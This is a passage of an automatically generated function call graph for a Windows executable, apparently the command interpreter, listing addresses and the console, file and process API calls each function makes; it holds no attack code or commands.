7ff79375c60e 18676 7ff79376ec14 173 API calls 18674->18676 18677 7ff79374c741 18675->18677 18676->18683 18679 7ff79374c74d 18677->18679 18682 7ff79374c8b5 wcsncmp 18677->18682 18678 7ff79374c872 18680 7ff79375855c ??_V@YAXPEAX 18678->18680 18679->18683 18685 7ff79374bd38 207 API calls 18679->18685 18684 7ff79374c87c 18680->18684 18681 7ff79375c6b8 SetConsoleTitleW 18681->18678 18682->18679 18682->18683 18683->18662 18683->18663 18683->18668 18683->18669 18683->18670 18683->18671 18683->18674 18687 7ff79374c83d 18683->18687 18690 7ff79374c78a wcschr 18683->18690 18693 7ff79374ca25 18683->18693 18694 7ff79375291c 8 API calls 18683->18694 18696 7ff79375c684 18683->18696 18699 7ff79374ca2a 18683->18699 18701 7ff79374ca16 GetLastError 18683->18701 18686 7ff793758f80 7 API calls 18684->18686 18685->18683 18689 7ff79374c88e 18686->18689 18890 7ff79374cb40 18687->18890 18689->18644 18690->18683 18692->18678 18692->18681 18697 7ff793743278 166 API calls 18693->18697 18694->18683 18698 7ff793743278 166 API calls 18696->18698 18697->18662 18698->18662 18700 7ff793759158 7 API calls 18699->18700 18700->18662 18703 7ff793743278 166 API calls 18701->18703 18703->18662 18705 7ff79374cd90 166 API calls 18704->18705 18706 7ff793755b12 18705->18706 18707 7ff79374cb40 166 API calls 18706->18707 18731 7ff793755b8b 18706->18731 18708 7ff793755b26 18707->18708 18711 7ff793750a6c 273 API calls 18708->18711 18708->18731 18709 7ff793758f80 7 API calls 18710 7ff79374bf99 18709->18710 18710->18644 18712 7ff793755b43 18711->18712 18713 7ff793755bb8 18712->18713 18714 7ff793755b48 GetConsoleTitleW 18712->18714 18715 7ff793755bbd GetConsoleTitleW 18713->18715 18716 7ff793755bf4 18713->18716 18717 7ff79374cad4 172 API calls 18714->18717 18718 7ff79374cad4 172 API calls 18715->18718 18719 7ff79375f452 18716->18719 18722 7ff793755bfd 18716->18722 18720 7ff793755b66 18717->18720 18721 7ff793755bdb 18718->18721 18724 7ff793753c24 166 API calls 18719->18724 18906 7ff793754224 InitializeProcThreadAttributeList 18720->18906 18970 7ff7937496e8 18721->18970 18726 7ff793755c1b 18722->18726 18727 7ff79375f462 18722->18727 18722->18731 18724->18731 18730 7ff793743278 166 API calls 18726->18730 18729 7ff793743278 166 API calls 18727->18729 18728 7ff793755b7f 18966 7ff793755c3c 18728->18966 18729->18731 18730->18731 18731->18709 18734 7ff79374c0c4 18733->18734 18735 7ff79374c01c 18733->18735 18734->18630 18736 7ff79374c086 18735->18736 18737 7ff79374c022 18735->18737 18741 7ff79374c144 18736->18741 18752 7ff79374c094 18736->18752 18738 7ff79374c113 18737->18738 18739 7ff79374c030 18737->18739 18750 7ff79374ff70 2 API calls 18738->18750 18754 7ff79374c053 18738->18754 18740 7ff79374c039 wcschr 18739->18740 18739->18754 18743 7ff79374c301 18740->18743 18740->18754 18742 7ff79374c151 18741->18742 18770 7ff79374c1c8 18741->18770 19296 7ff79374c460 18742->19296 18749 7ff79374cd90 166 API calls 18743->18749 18744 7ff79374c058 18756 7ff79374ff70 2 API calls 18744->18756 18758 7ff79374c073 18744->18758 18745 7ff79374c0c6 18748 7ff79374c0cf wcschr 18745->18748 18745->18758 18747 7ff79374c460 183 API calls 18747->18752 18753 7ff79374c1be 18748->18753 18748->18758 18766 7ff79374c30b 18749->18766 18750->18754 18752->18734 18752->18747 18755 7ff79374cd90 166 API calls 18753->18755 18754->18744 18754->18745 18760 7ff79374c211 18754->18760 18755->18770 18756->18758 18757 7ff79374c460 183 API calls 18757->18734 18758->18734 18759 7ff79374c460 183 API calls 18758->18759 18759->18758 18764 7ff79374ff70 2 API calls 18760->18764 18761 7ff79374c285 18761->18760 18765 7ff79374b6b0 170 API calls 18761->18765 18762 7ff79374b6b0 170 API calls 18762->18754 18763 7ff79374d840 178 API calls 18763->18766 18764->18734 18768 7ff79374c2ac 18765->18768 18766->18734 18766->18760 18766->18763 18769 7ff79374c3d4 18766->18769 18767 7ff79374d840 178 API calls 18767->18770 18768->18758 18768->18760 18769->18758 18769->18760 18769->18762 18770->18734 18770->18760 18770->18761 18770->18767 18772 7ff79374ca40 17 API calls 18771->18772 18779 7ff79374b162 18772->18779 18773 7ff79374b1d9 18778 7ff79374cd90 166 API calls 18773->18778 18798 7ff79374b1ed 18773->18798 18774 7ff79374b2f7 ??_V@YAXPEAX 18775 7ff79374b303 18774->18775 18777 7ff793758f80 7 API calls 18775->18777 18776 7ff793751ea0 8 API calls 18776->18779 18780 7ff79374b315 18777->18780 18778->18798 18779->18773 18779->18776 18805 7ff79374b2e1 18779->18805 18780->18634 18780->18646 18782 7ff79374b228 _get_osfhandle 18784 7ff79374b23f _get_osfhandle 18782->18784 18782->18798 18783 7ff79375bfef _get_osfhandle SetFilePointer 18785 7ff79375c01d 18783->18785 18783->18798 18784->18798 18787 7ff7937533f0 _vsnwprintf 18785->18787 18789 7ff79375c038 18787->18789 18788 7ff7937501b8 6 API calls 18788->18798 18794 7ff793743278 166 API calls 18789->18794 18790 7ff79375c1c3 18792 7ff7937533f0 _vsnwprintf 18790->18792 18791 7ff7937526e0 19 API calls 18791->18798 18792->18789 18793 7ff79374d208 _close 18793->18798 18796 7ff79375c1f9 18794->18796 18795 7ff79375c060 18799 7ff79375c246 18795->18799 18803 7ff7937509f4 2 API calls 18795->18803 18801 7ff79374af98 2 API calls 18796->18801 18797 7ff79374b038 _dup2 18797->18798 18798->18782 18798->18783 18798->18788 18798->18790 18798->18791 18798->18793 18798->18795 18798->18797 18798->18799 18800 7ff79375c1a5 18798->18800 18798->18805 18806 7ff79374b356 18798->18806 19310 7ff79374affc _dup 18798->19310 19312 7ff79376f318 _get_osfhandle GetFileType 18798->19312 18804 7ff79374af98 2 API calls 18799->18804 18802 7ff79374b038 _dup2 18800->18802 18801->18805 18807 7ff79375c1b7 18802->18807 18808 7ff79375c084 18803->18808 18809 7ff79375c24b 18804->18809 18805->18774 18805->18775 18815 7ff79374af98 2 API calls 18806->18815 18810 7ff79375c1be 18807->18810 18811 7ff79375c207 18807->18811 18812 7ff79374b900 166 API calls 18808->18812 18813 7ff79376f1d8 166 API calls 18809->18813 18816 7ff79374d208 _close 18810->18816 18814 7ff79374d208 _close 18811->18814 18817 7ff79375c08c 18812->18817 18813->18805 18814->18806 18818 7ff79375c211 18815->18818 18816->18790 18819 7ff79375c094 wcsrchr 18817->18819 18829 7ff79375c0ad 18817->18829 18820 7ff7937533f0 _vsnwprintf 18818->18820 18819->18829 18821 7ff79375c22c 18820->18821 18822 7ff793743278 166 API calls 18821->18822 18822->18805 18823 7ff79375c106 18825 7ff79374ff70 2 API calls 18823->18825 18824 7ff79375c0e0 _wcsnicmp 18824->18829 18826 7ff79375c13b 18825->18826 18826->18799 18827 7ff79375c146 SearchPathW 18826->18827 18827->18799 18828 7ff79375c188 18827->18828 18830 7ff7937526e0 19 API calls 18828->18830 18829->18823 18829->18824 18830->18800 18832 7ff793751ea0 8 API calls 18831->18832 18833 7ff793750ab9 18832->18833 18834 7ff793750b12 memset 18833->18834 18835 7ff793750aee _wcsnicmp 18833->18835 18836 7ff79375d927 18833->18836 18843 7ff79375128f ??_V@YAXPEAX 18833->18843 18837 7ff79374ca40 17 API calls 18834->18837 18835->18834 18835->18836 18839 7ff79375081c 166 API calls 18836->18839 18838 7ff793750b5a 18837->18838 18841 7ff79374b364 17 API calls 18838->18841 18853 7ff79375d94e 18838->18853 18840 7ff79375d933 18839->18840 18840->18834 18840->18843 18861 7ff793750b6f 18841->18861 18842 7ff79375d96b ??_V@YAXPEAX 18842->18853 18844 7ff793750b8c wcschr 18844->18861 18847 7ff79375d99a wcschr 18847->18853 18848 7ff793750c0f wcsrchr 18848->18853 18848->18861 18849 7ff79375d9ca GetFileAttributesW 18850 7ff79375da64 18849->18850 18849->18853 18851 7ff79375081c 166 API calls 18851->18861 18852 7ff79375da90 GetFileAttributesW 18852->18853 18854 7ff79375daa8 GetLastError 18852->18854 18853->18842 18853->18847 18853->18849 18853->18850 18855 7ff79375d9fd ??_V@YAXPEAX 18853->18855 18854->18850 18856 7ff79375dab9 18854->18856 18855->18853 18856->18853 18857 7ff79374cd90 166 API calls 18857->18861 18858 7ff79374d3f0 223 API calls 18858->18861 18859 7ff793753060 171 API calls 18859->18861 18860 7ff793751ea0 8 API calls 18860->18861 18861->18843 18861->18844 18861->18848 18861->18851 18861->18853 18861->18857 18861->18858 18861->18859 18861->18860 18861->18861 18862 7ff79374af74 170 API calls 18861->18862 18863 7ff793750d71 wcsrchr 18861->18863 18865 7ff793750fb1 wcsrchr 18861->18865 18866 7ff79375291c 8 API calls 18861->18866 18867 7ff793750fd0 wcschr 18861->18867 18868 7ff793752eb4 22 API calls 18861->18868 18871 7ff7937510fd wcsrchr 18861->18871 18880 7ff793751087 _wcsicmp 18861->18880 18883 7ff79375da74 18861->18883 19313 7ff793753bac 18861->19313 19317 7ff793752efc 18861->19317 18862->18861 18863->18861 18864 7ff793750d97 NeedCurrentDirectoryForExePathW 18863->18864 18864->18853 18864->18861 18865->18861 18865->18867 18866->18861 18867->18850 18869 7ff793750fed wcschr 18867->18869 18868->18861 18869->18850 18869->18861 18871->18861 18872 7ff79375111a _wcsicmp 18871->18872 18873 7ff79375123d 18872->18873 18874 7ff793751138 _wcsicmp 18872->18874 18876 7ff793751175 18873->18876 18877 7ff793751250 ??_V@YAXPEAX 18873->18877 18874->18873 18875 7ff7937510c5 18874->18875 18875->18876 18878 7ff793751169 ??_V@YAXPEAX 18875->18878 18879 7ff793758f80 7 API calls 18876->18879 18877->18876 18878->18876 18881 7ff793751189 18879->18881 18882 7ff7937510a7 _wcsicmp 18880->18882 18880->18883 18881->18645 18882->18875 18882->18883 18883->18850 18883->18852 18885 7ff793747211 _setjmp 18884->18885 18889 7ff793747279 18884->18889 18887 7ff793747265 18885->18887 18885->18889 19331 7ff7937472b0 18887->19331 18889->18651 18891 7ff79374cb63 18890->18891 18892 7ff79374cd90 166 API calls 18891->18892 18893 7ff79374c848 18892->18893 18893->18692 18894 7ff79374cad4 18893->18894 18895 7ff79374cad9 18894->18895 18903 7ff79374cb05 18894->18903 18896 7ff79374cd90 166 API calls 18895->18896 18895->18903 18897 7ff79375c722 18896->18897 18898 7ff79375c72e GetConsoleTitleW 18897->18898 18897->18903 18899 7ff79375c74a 18898->18899 18898->18903 18900 7ff79374b6b0 170 API calls 18899->18900 18905 7ff79375c778 18900->18905 18901 7ff79375c7ec 18902 7ff79374ff70 2 API calls 18901->18902 18902->18903 18903->18692 18904 7ff79375c7dd SetConsoleTitleW 18904->18901 18905->18901 18905->18904 18907 7ff7937542ab UpdateProcThreadAttribute 18906->18907 18908 7ff79375ecd4 GetLastError 18906->18908 18909 7ff7937542eb memset memset GetStartupInfoW 18907->18909 18910 7ff79375ecf0 GetLastError 18907->18910 18911 7ff79375ecee 18908->18911 18913 7ff793753a90 170 API calls 18909->18913 19007 7ff793769eec 18910->19007 18915 7ff7937543a8 18913->18915 18916 7ff79374b900 166 API calls 18915->18916 18917 7ff7937543bb 18916->18917 18918 7ff7937543cc 18917->18918 18919 7ff793754638 _local_unwind 18917->18919 18920 7ff7937543de wcsrchr 18918->18920 18921 7ff793754415 18918->18921 18919->18918 18920->18921 18922 7ff7937543f7 lstrcmpW 18920->18922 18994 7ff793755a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18921->18994 18922->18921 18925 7ff793754668 18922->18925 18924 7ff79375441a 18926 7ff79375442a CreateProcessW 18924->18926 18929 7ff793754596 CreateProcessAsUserW 18924->18929 18995 7ff793769044 18925->18995 18928 7ff79375448b 18926->18928 18930 7ff793754495 CloseHandle 18928->18930 18931 7ff793754672 GetLastError 18928->18931 18929->18928 18932 7ff79375498c 8 API calls 18930->18932 18939 7ff79375468d 18931->18939 18933 7ff7937544c5 18932->18933 18938 7ff7937544cd 18933->18938 18933->18939 18934 7ff7937547a3 18934->18728 18935 7ff7937544f8 18935->18934 18937 7ff793754612 18935->18937 18941 7ff793755cb4 7 API calls 18935->18941 18936 7ff79374cd90 166 API calls 18940 7ff793754724 18936->18940 18942 7ff79375461c 18937->18942 18944 7ff7937547e1 CloseHandle 18937->18944 18938->18934 18938->18935 18953 7ff79376a250 33 API calls 18938->18953 18939->18936 18939->18938 18943 7ff79375472c _local_unwind 18940->18943 18950 7ff79375473d 18940->18950 18945 7ff793754517 18941->18945 18946 7ff79374ff70 GetProcessHeap RtlFreeHeap 18942->18946 18943->18950 18944->18942 18947 7ff7937533f0 _vsnwprintf 18945->18947 18948 7ff7937547fa DeleteProcThreadAttributeList 18946->18948 18949 7ff793754544 18947->18949 18951 7ff793758f80 7 API calls 18948->18951 18952 7ff79375498c 8 API calls 18949->18952 18958 7ff79374ff70 GetProcessHeap RtlFreeHeap 18950->18958 18954 7ff793754820 18951->18954 18955 7ff793754558 18952->18955 18953->18935 18954->18728 18956 7ff7937547ae 18955->18956 18957 7ff793754564 18955->18957 18960 7ff7937533f0 _vsnwprintf 18956->18960 18959 7ff79375498c 8 API calls 18957->18959 18961 7ff79375475b _local_unwind 18958->18961 18962 7ff793754577 18959->18962 18960->18937 18961->18938 18962->18942 18963 7ff79375457f 18962->18963 18964 7ff79376a920 210 API calls 18963->18964 18965 7ff793754584 18964->18965 18965->18942 18967 7ff793755c4e 18966->18967 18968 7ff793755c45 18966->18968 18967->18731 18968->18967 18969 7ff79375f470 SetConsoleTitleW 18968->18969 18969->18967 18987 7ff793749737 18970->18987 18972 7ff79374977d memset 18974 7ff79374ca40 17 API calls 18972->18974 18973 7ff79374cd90 166 API calls 18973->18987 18974->18987 18975 7ff79375b7b3 18976 7ff79375b76e 18978 7ff793743278 166 API calls 18976->18978 18977 7ff79375b79a 18980 7ff79375855c ??_V@YAXPEAX 18977->18980 18981 7ff79375b787 18978->18981 18979 7ff79374b364 17 API calls 18979->18987 18980->18975 18982 7ff79375b795 18981->18982 19097 7ff79376e944 18981->19097 19105 7ff793767694 18982->19105 18987->18972 18987->18973 18987->18975 18987->18976 18987->18977 18987->18979 18987->18987 18989 7ff79374986d 18987->18989 19009 7ff793751fac memset 18987->19009 19036 7ff79374ce10 18987->19036 19086 7ff7937496b4 18987->19086 19091 7ff793755920 18987->19091 18990 7ff79374988c 18989->18990 18991 7ff793749880 ??_V@YAXPEAX 18989->18991 18992 7ff793758f80 7 API calls 18990->18992 18991->18990 18993 7ff79374989d 18992->18993 18993->18728 18996 7ff793753a90 170 API calls 18995->18996 18997 7ff793769064 18996->18997 18998 7ff79376906e 18997->18998 18999 7ff793769083 18997->18999 19000 7ff79375498c 8 API calls 18998->19000 19001 7ff79374cd90 166 API calls 18999->19001 19002 7ff793769081 19000->19002 19003 7ff79376909b 19001->19003 19002->18921 19003->19002 19004 7ff79375498c 8 API calls 19003->19004 19005 7ff7937690ec 19004->19005 19006 7ff79374ff70 2 API calls 19005->19006 19006->19002 19008 7ff79375ed0a DeleteProcThreadAttributeList 19007->19008 19008->18911 19010 7ff79375203b 19009->19010 19011 7ff7937520b0 19010->19011 19012 7ff793752094 19010->19012 19013 7ff793753060 171 API calls 19011->19013 19015 7ff79375211c 19011->19015 19014 7ff7937520a6 19012->19014 19016 7ff793743278 166 API calls 19012->19016 19013->19015 19018 7ff793758f80 7 API calls 19014->19018 19015->19014 19017 7ff793752e44 2 API calls 19015->19017 19016->19014 19020 7ff793752148 19017->19020 19019 7ff793752325 19018->19019 19019->18987 19020->19014 19021 7ff793752d70 3 API calls 19020->19021 19022 7ff7937521af 19021->19022 19023 7ff79374b900 166 API calls 19022->19023 19025 7ff7937521d0 19023->19025 19024 7ff79375e04a ??_V@YAXPEAX 19024->19014 19025->19024 19026 7ff79375221c wcsspn 19025->19026 19035 7ff7937522a4 ??_V@YAXPEAX 19025->19035 19028 7ff79374b900 166 API calls 19026->19028 19029 7ff79375223b 19028->19029 19029->19024 19032 7ff793752252 19029->19032 19030 7ff79374d3f0 223 API calls 19030->19035 19031 7ff79375e06d wcschr 19031->19032 19032->19031 19033 7ff79375e090 towupper 19032->19033 19034 7ff79375228f 19032->19034 19033->19032 19033->19034 19034->19030 19035->19014 19074 7ff79374d0f8 19036->19074 19082 7ff79374ce5b 19036->19082 19037 7ff793758f80 7 API calls 19040 7ff79374d10a 19037->19040 19038 7ff79375c860 19039 7ff79375c97c 19038->19039 19144 7ff79376ee88 19038->19144 19041 7ff79376e9b4 197 API calls 19039->19041 19040->18987 19044 7ff79375c981 longjmp 19041->19044 19046 7ff79375c99a 19044->19046 19050 7ff79375c9b3 ??_V@YAXPEAX 19046->19050 19046->19074 19047 7ff79375c95c 19047->19039 19053 7ff7937496b4 186 API calls 19047->19053 19048 7ff79375c882 EnterCriticalSection LeaveCriticalSection 19052 7ff79374d0e3 19048->19052 19050->19074 19051 7ff79374ceaa _tell 19054 7ff79374d208 _close 19051->19054 19052->18987 19053->19047 19054->19082 19055 7ff79374cd90 166 API calls 19055->19082 19056 7ff79375c9d5 19057 7ff79376d610 167 API calls 19056->19057 19059 7ff79375c9da 19057->19059 19058 7ff79374b900 166 API calls 19058->19082 19060 7ff79375ca07 19059->19060 19062 7ff79376bfec 176 API calls 19059->19062 19061 7ff79376e91c 198 API calls 19060->19061 19066 7ff79375ca0c 19061->19066 19063 7ff79375c9f1 19062->19063 19064 7ff793743240 166 API calls 19063->19064 19064->19060 19065 7ff79374cf33 memset 19065->19082 19066->18987 19067 7ff79374ca40 17 API calls 19067->19082 19068 7ff79374d184 wcschr 19068->19082 19069 7ff79376bfec 176 API calls 19069->19082 19070 7ff79375c9c9 19072 7ff79375855c ??_V@YAXPEAX 19070->19072 19071 7ff79374d1a7 wcschr 19071->19082 19072->19074 19074->19037 19075 7ff793750a6c 273 API calls 19075->19082 19076 7ff79374be00 635 API calls 19076->19082 19077 7ff793753448 166 API calls 19077->19082 19078 7ff79374cfab _wcsicmp 19078->19082 19079 7ff793750580 12 API calls 19080 7ff79374d003 GetConsoleOutputCP GetCPInfo 19079->19080 19081 7ff7937504f4 3 API calls 19080->19081 19081->19082 19082->19038 19082->19046 19082->19052 19082->19055 19082->19056 19082->19058 19082->19065 19082->19067 19082->19068 19082->19069 19082->19070 19082->19071 19082->19074 19082->19075 19082->19076 19082->19077 19082->19078 19082->19079 19084 7ff793751fac 238 API calls 19082->19084 19085 7ff79374d044 ??_V@YAXPEAX 19082->19085 19111 7ff793750494 19082->19111 19124 7ff79374df60 19082->19124 19180 7ff79376778c 19082->19180 19211 7ff79376c738 19082->19211 19084->19082 19085->19082 19087 7ff7937496c8 19086->19087 19088 7ff79375b6e2 RevertToSelf CloseHandle 19086->19088 19089 7ff7937496ce 19087->19089 19090 7ff793746a48 184 API calls 19087->19090 19089->18987 19090->19087 19092 7ff79375596c 19091->19092 19093 7ff793755a12 19091->19093 19092->19093 19094 7ff79375598d VirtualQuery 19092->19094 19093->18987 19094->19093 19096 7ff7937559ad 19094->19096 19095 7ff7937559b7 VirtualQuery 19095->19093 19095->19096 19096->19093 19096->19095 19098 7ff79376e954 19097->19098 19099 7ff79376e990 19097->19099 19100 7ff79376ee88 390 API calls 19098->19100 19101 7ff79376e9b4 197 API calls 19099->19101 19103 7ff79376e964 19100->19103 19102 7ff79376e995 longjmp 19101->19102 19103->19099 19104 7ff7937496b4 186 API calls 19103->19104 19104->19103 19106 7ff7937676a3 19105->19106 19107 7ff7937676b7 19106->19107 19109 7ff7937496b4 186 API calls 19106->19109 19108 7ff79376e9b4 197 API calls 19107->19108 19110 7ff7937676bc longjmp 19108->19110 19109->19106 19113 7ff7937504a4 19111->19113 19112 7ff7937526e0 19 API calls 19112->19113 19113->19112 19114 7ff7937504b9 _get_osfhandle SetFilePointer 19113->19114 19115 7ff79375d845 19113->19115 19117 7ff79375d839 19113->19117 19120 7ff793743278 166 API calls 19113->19120 19114->19082 19116 7ff79376f1d8 166 API calls 19115->19116 19119 7ff79375d837 19116->19119 19118 7ff793743278 166 API calls 19117->19118 19118->19119 19121 7ff79375d819 _getch 19120->19121 19121->19113 19122 7ff79375d832 19121->19122 19221 7ff79376bde4 EnterCriticalSection LeaveCriticalSection 19122->19221 19125 7ff79374df93 19124->19125 19126 7ff79374dfe2 19124->19126 19125->19126 19127 7ff79374df9f GetProcessHeap RtlFreeHeap 19125->19127 19128 7ff79374e100 VirtualFree 19126->19128 19129 7ff79374e00b _setjmp 19126->19129 19127->19125 19127->19126 19128->19126 19130 7ff79374e04a 19129->19130 19131 7ff79374e0c3 19129->19131 19132 7ff79374e600 473 API calls 19130->19132 19131->19051 19133 7ff79374e073 19132->19133 19134 7ff79374e0e0 longjmp 19133->19134 19135 7ff79374e081 19133->19135 19143 7ff79374e0b0 19134->19143 19136 7ff79374d250 475 API calls 19135->19136 19137 7ff79374e086 19136->19137 19140 7ff79374e600 473 API calls 19137->19140 19137->19143 19141 7ff79374e0a7 19140->19141 19142 7ff79376d610 167 API calls 19141->19142 19141->19143 19142->19143 19143->19131 19222 7ff79376d3fc 19143->19222 19145 7ff79376eefd 19144->19145 19146 7ff79376eed1 19144->19146 19284 7ff79375885c FormatMessageW 19145->19284 19270 7ff793747420 19146->19270 19150 7ff7937501b8 6 API calls 19151 7ff79376eee5 19150->19151 19153 7ff79376eeeb 19151->19153 19154 7ff79376eef8 19151->19154 19152 7ff79376ef04 19155 7ff79376ef41 LocalFree GetStdHandle GetConsoleMode 19152->19155 19158 7ff79376ef2f _wcsupr 19152->19158 19156 7ff79374d208 _close 19153->19156 19157 7ff79374d208 _close 19154->19157 19160 7ff79376efe8 GetStdHandle GetConsoleMode 19155->19160 19161 7ff79376efcf SetConsoleMode 19155->19161 19177 7ff79376eef0 19156->19177 19157->19145 19158->19155 19162 7ff79376f015 SetConsoleMode 19160->19162 19170 7ff79376f03c 19160->19170 19161->19160 19162->19170 19163 7ff793758f80 7 API calls 19164 7ff79375c879 19163->19164 19164->19047 19164->19048 19165 7ff793743240 166 API calls 19165->19170 19166 7ff79376f07e GetStdHandle FlushConsoleInputBuffer 19166->19170 19167 7ff79376f0a0 GetStdHandle 19168 7ff793768450 367 API calls 19167->19168 19168->19170 19169 7ff79376f12d wcschr 19169->19170 19170->19165 19170->19166 19170->19167 19170->19169 19171 7ff79376f161 19170->19171 19174 7ff793753448 166 API calls 19170->19174 19176 7ff79376f0d7 towupper 19170->19176 19178 7ff7937501b8 6 API calls 19170->19178 19179 7ff793753448 166 API calls 19170->19179 19172 7ff79376f17a 19171->19172 19173 7ff79376f166 SetConsoleMode 19171->19173 19175 7ff79376f17f SetConsoleMode 19172->19175 19172->19177 19173->19172 19174->19169 19175->19177 19176->19170 19177->19163 19178->19170 19179->19170 19203 7ff7937677bc 19180->19203 19181 7ff793767aca 19184 7ff7937534a0 166 API calls 19181->19184 19182 7ff7937679c0 19188 7ff7937534a0 166 API calls 19182->19188 19186 7ff793767adb 19184->19186 19185 7ff793767ab5 19189 7ff793753448 166 API calls 19185->19189 19191 7ff793767af0 19186->19191 19194 7ff793753448 166 API calls 19186->19194 19187 7ff793767984 19187->19182 19192 7ff793767989 19187->19192 19193 7ff7937679d6 19188->19193 19204 7ff7937679ef 19189->19204 19190 7ff793767a00 19196 7ff793767a0b 19190->19196 19190->19204 19207 7ff793767a33 19190->19207 19195 7ff79376778c 166 API calls 19191->19195 19192->19204 19289 7ff7937676e0 19192->19289 19198 7ff793753448 166 API calls 19193->19198 19210 7ff7937679e7 19193->19210 19194->19191 19197 7ff793767afb 19195->19197 19200 7ff7937534a0 166 API calls 19196->19200 19196->19204 19197->19192 19201 7ff793753448 166 API calls 19197->19201 19198->19210 19205 7ff793767a23 19200->19205 19201->19192 19202 7ff793753448 166 API calls 19202->19204 19203->19181 19203->19182 19203->19185 19203->19187 19203->19190 19203->19192 19203->19204 19206 7ff79376778c 166 API calls 19203->19206 19209 7ff793753448 166 API calls 19203->19209 19204->19082 19208 7ff79376778c 166 API calls 19205->19208 19206->19203 19207->19202 19208->19210 19209->19203 19285 7ff793767730 19210->19285 19212 7ff79376c775 19211->19212 19218 7ff79376c7ab 19211->19218 19213 7ff79374cd90 166 API calls 19212->19213 19214 7ff79376c781 19213->19214 19215 7ff79376c8d4 19214->19215 19216 7ff79374b0d8 194 API calls 19214->19216 19215->19082 19216->19215 19217 7ff79374b6b0 170 API calls 19217->19218 19218->19214 19218->19215 19218->19217 19219 7ff79374b038 _dup2 19218->19219 19220 7ff79374d208 _close 19218->19220 19219->19218 19220->19218 19224 7ff79376d419 19222->19224 19223 7ff79376d576 19225 7ff79376d555 19223->19225 19226 7ff79376d592 19223->19226 19224->19223 19224->19225 19224->19226 19228 7ff79376d5c4 19224->19228 19231 7ff79376d541 19224->19231 19234 7ff793753448 166 API calls 19224->19234 19238 7ff79375cadf 19224->19238 19239 7ff79376d3fc 166 API calls 19224->19239 19247 7ff79376d31c 19225->19247 19227 7ff793753448 166 API calls 19226->19227 19230 7ff79376d5a5 19227->19230 19232 7ff793753448 166 API calls 19228->19232 19233 7ff79376d5ba 19230->19233 19236 7ff793753448 166 API calls 19230->19236 19231->19226 19235 7ff79376d546 19231->19235 19232->19238 19240 7ff79376d36c 19233->19240 19234->19224 19235->19225 19235->19228 19236->19233 19239->19224 19241 7ff79376d3d8 19240->19241 19242 7ff79376d381 19240->19242 19243 7ff7937534a0 166 API calls 19242->19243 19245 7ff79376d390 19243->19245 19244 7ff793753448 166 API calls 19244->19245 19245->19241 19245->19244 19246 7ff7937534a0 166 API calls 19245->19246 19246->19245 19248 7ff793753448 166 API calls 19247->19248 19249 7ff79376d33b 19248->19249 19250 7ff79376d36c 166 API calls 19249->19250 19251 7ff79376d343 19250->19251 19252 7ff79376d3fc 166 API calls 19251->19252 19254 7ff79376d34e 19252->19254 19253 7ff79376d576 19255 7ff79376d592 19253->19255 19263 7ff79376d555 19253->19263 19254->19253 19254->19255 19257 7ff79376d5c4 19254->19257 19260 7ff79376d541 19254->19260 19254->19263 19266 7ff79376d3fc 166 API calls 19254->19266 19268 7ff79376d5c2 19254->19268 19269 7ff793753448 166 API calls 19254->19269 19256 7ff793753448 166 API calls 19255->19256 19259 7ff79376d5a5 19256->19259 19261 7ff793753448 166 API calls 19257->19261 19258 7ff79376d31c 166 API calls 19258->19268 19262 7ff79376d5ba 19259->19262 19264 7ff793753448 166 API calls 19259->19264 19260->19255 19267 7ff79376d546 19260->19267 19261->19268 19265 7ff79376d36c 166 API calls 19262->19265 19263->19258 19264->19262 19265->19268 19266->19254 19267->19257 19267->19263 19268->19238 19269->19254 19271 7ff793747468 19270->19271 19272 7ff79374745f 19270->19272 19271->19145 19271->19150 19272->19271 19273 7ff793747497 _wcsicmp 19272->19273 19274 7ff7937648c8 _wcsicmp 19272->19274 19275 7ff793751ea0 8 API calls 19273->19275 19276 7ff7937648ed CreateFileW 19274->19276 19277 7ff7937474bd 19275->19277 19278 7ff7937474c9 CreateFileW 19276->19278 19279 7ff793764929 19276->19279 19277->19276 19277->19278 19280 7ff793747501 _open_osfhandle 19278->19280 19281 7ff793764943 GetLastError 19278->19281 19279->19280 19280->19271 19282 7ff793747520 CloseHandle 19280->19282 19281->19271 19282->19271 19284->19152 19288 7ff79376773c 19285->19288 19286 7ff79376777d 19286->19204 19287 7ff793753448 166 API calls 19287->19288 19288->19286 19288->19287 19290 7ff79376778c 166 API calls 19289->19290 19291 7ff7937676fb 19290->19291 19292 7ff79376771c 19291->19292 19293 7ff793753448 166 API calls 19291->19293 19292->19204 19294 7ff793767711 19293->19294 19295 7ff79376778c 166 API calls 19294->19295 19295->19292 19297 7ff79374c4c9 19296->19297 19298 7ff79374c486 19296->19298 19302 7ff79374ff70 2 API calls 19297->19302 19303 7ff79374c161 19297->19303 19299 7ff79374c48e wcschr 19298->19299 19298->19303 19300 7ff79374c4ef 19299->19300 19299->19303 19301 7ff79374cd90 166 API calls 19300->19301 19309 7ff79374c4f9 19301->19309 19302->19303 19303->18734 19303->18757 19304 7ff79374c5bd 19306 7ff79374b6b0 170 API calls 19304->19306 19308 7ff79374c541 19304->19308 19305 7ff79374ff70 2 API calls 19305->19303 19306->19308 19307 7ff79374d840 178 API calls 19307->19309 19308->19303 19308->19305 19309->19303 19309->19304 19309->19307 19309->19308 19311 7ff79374b018 19310->19311 19311->18798 19312->18798 19314 7ff793753bcf 19313->19314 19316 7ff793753bfe 19313->19316 19315 7ff793753bdc wcschr 19314->19315 19314->19316 19315->19314 19315->19316 19316->18861 19318 7ff793752f97 19317->19318 19319 7ff793752f2a 19317->19319 19318->19319 19320 7ff793752f9c wcschr 19318->19320 19321 7ff79375823c 10 API calls 19319->19321 19322 7ff793752fb6 wcschr 19320->19322 19323 7ff793752f5a 19320->19323 19324 7ff793752f56 19321->19324 19322->19319 19322->19323 19326 7ff793758f80 7 API calls 19323->19326 19330 7ff79375e4ec 19323->19330 19324->19323 19325 7ff793753a0c 2 API calls 19324->19325 19327 7ff793752fe0 19325->19327 19328 7ff793752f83 19326->19328 19327->19323 19329 7ff793752fe9 wcsrchr 19327->19329 19328->18861 19329->19323 19332 7ff7937472de 19331->19332 19333 7ff793764621 19331->19333 19334 7ff7937472eb 19332->19334 19342 7ff793764467 19332->19342 19343 7ff793764530 19332->19343 19335 7ff7937647e0 19333->19335 19336 7ff79376447b longjmp 19333->19336 19339 7ff793764639 19333->19339 19367 7ff79376475e 19333->19367 19392 7ff793747348 19334->19392 19338 7ff793747348 168 API calls 19335->19338 19340 7ff793764492 19336->19340 19390 7ff793764524 19338->19390 19344 7ff793764695 19339->19344 19359 7ff79376463e 19339->19359 19345 7ff793747348 168 API calls 19340->19345 19342->19334 19342->19340 19348 7ff793764475 19342->19348 19346 7ff793747348 168 API calls 19343->19346 19353 